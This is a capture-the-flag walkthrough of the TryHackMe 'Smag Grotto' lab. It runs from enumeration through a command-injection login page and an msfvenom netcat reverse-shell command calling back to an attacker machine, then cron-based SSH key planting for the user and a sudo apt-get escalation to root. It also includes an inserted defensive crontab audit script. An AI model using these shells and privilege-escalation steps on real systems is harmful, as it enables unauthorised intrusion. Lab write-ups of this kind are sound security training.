bobloblaw321

TryHackMe - Smag Grotto

I'll be going over an easy-level CTF on TryHackMe, Smag Grotto:


 

Scanning & Enumeration

As always, we begin by enumerating the machine's ports and services. I use my personal script to obtain the ports with Threader3000 and then scan the open ones with nmap (although I believe the latest Threader3000 now feeds the open ports into nmap for you).



nmap -T4 -Pn -p22,80 -A {ip}

 

Enumerating Services


Port 22: ssh

Even though ssh is open, I leave that alone for now as I probably won't be able to exploit it.


Port 80: http

This is our only other option, so let's check it out.


There's nothing interesting on the homepage, so let's try some directory busting:


You can use any tool you like; I like dirsearch because of the speed.


python3 /opt/dirsearch/dirsearch.py -u 10.10.221.182 -e '*' -r

We have an interesting finding with 'mail', so let's check that out now:


On the mail page, the posts talk about downloading files, so I tried to download the pcap mentioned in the post simply by clicking on the file shown there, and it worked:


Opening the downloaded pcap file in Wireshark, we see this:

In the pcap there's an interesting packet that's making a POST request to 'login.php'. To make it easier to look at, I follow the HTTP stream, which you do like this (right click on the desired packet):


After following the stream, we see some plaintext credentials, as well as what looks like a subdomain in 'development.smag.thm':


 

Vulnerable WebApp

In order to visit a subdomain, we must first add it to our /etc/hosts file so the name can be resolved to the IP:


Once we've done that we can go out to the site:


It's just a file system, but if you remember from the pcap, those credentials were actually from /login.php, so let's check that out:


Just a typical login screen, as I expected. Trying the credentials we found we're able to log in. Once logged in, we see a field to simply input commands. After trying bash and python reverse shells with no luck, I tried a netcat one, and was able to gain access! To create a netcat reverse shell you can use msfvenom, with this syntax:


msfvenom -p cmd/unix/reverse_tcp lhost=attack_machine_ip lport=4444 R

Setting up a listener on the port selected above and then shooting off that command in the app's prompt, we get our reverse shell:


Once I have access, I do my usual commands to gain a fully interactive tty shell:


python3 -c "import pty;pty.spawn('/bin/bash')"
ctrl+z
stty raw -echo
fg
fg
export TERM=xterm-256color

 

Getting User

Once I was on the machine as www-data, I checked to see if I had access to anything from the user, but had no luck. So I enumerated a bit, and found this running as a cronjob:


What it seems to be doing is taking a public RSA key and putting it into the authorized keys file for the user. Knowing this, we can generate our own RSA key pair, put the public key into that backup file, and then ssh in with the private key that we generated. The first thing we have to check is whether or not we have write permissions to that file. If we do, we're golden; if not, then this privesc won't work:


Navigating to the directory we see that everyone has read/write permissions to the file referenced in the cronjob, so we should be good to go! Moving forward with the steps I laid out earlier:


You can generate an RSA key pair as shown above. I then replaced the file on the target machine with the public key I just generated:


Once that was set up, I waited a minute for the cronjob to execute and then tried ssh-ing in with the private key I had generated:


And we are the user! Let's grab that flag:
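
Seen from the defender's side, the weakness in this section is a cron job that trusts a world-writable file. The audit below is an added example, not part of the original walkthrough; the function names and the sample crontab and paths are constructed for illustration. It lists every existing path referenced by a crontab command whose "other" write bit is set:

```shell
#!/bin/sh
# audit_cron_writable CRONTAB_FILE
# Print each existing absolute path referenced in a cron command that
# any local user can write to (mode bit o+w).
audit_cron_writable() {
    crontab_file=$1
    # Skip comments, blank lines and VAR=value lines, then extract absolute paths.
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$crontab_file" |
    grep -Eo '/[A-Za-z0-9_./-]+' | sort -u |
    while IFS= read -r path; do
        [ -e "$path" ] || continue
        # -perm -0002 matches when the "other" write bit is set;
        # symlinks are skipped because their own mode is always 777.
        if [ -n "$(find "$path" -maxdepth 0 -perm -0002 ! -type l 2>/dev/null)" ]; then
            printf '%s\n' "$path"
        fi
    done
}

# Build a constructed sample in DIR that mirrors the job described above:
# a scheduled command copies a key file into authorized_keys.
make_sample() {
    dir=$1
    printf 'ssh-rsa AAAA-constructed-sample\n' > "$dir/key_backup.pub"
    printf 'constructed log\n' > "$dir/job.log"
    chmod 666 "$dir/key_backup.pub"   # world-writable input: should be reported
    chmod 644 "$dir/job.log"          # normal permissions: should not be reported
    cat > "$dir/crontab" <<EOF
# m h dom mon dow user command
SHELL=/bin/sh
* * * * * root cat $dir/key_backup.pub > $dir/authorized_keys; date >> $dir/job.log
EOF
}

# Demo run on the constructed sample.
tmp=$(mktemp -d) && make_sample "$tmp" && audit_cron_writable "$tmp/crontab"
rm -rf "$tmp"
```

On a real host, point it at /etc/crontab and each file in /etc/cron.d; any path it prints should be owned by the account the job runs as and not writable by others.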



 

Privesc to Root

For the final privesc to root, I basically started the enumeration process all over again, this time starting with checking my sudo privileges:


We can run something with sudo. Checking out the amazing website GTFOBins, I found that apt-get indeed has an entry. Following the steps laid out by GTFOBins, I'm able to escalate my privileges to root!



 

Bonus


That's all for now, thanks a bunch to @jakeyee on discord, as this was his box. This was a very fun boot2root!


If there are any questions or feedback at all on the walkthrough or anything I did, or anything at all, feel free to reach out to me on the THM website or their discord server under the name @bobloblaw#9228!


That's all for now, thanks for reading :)
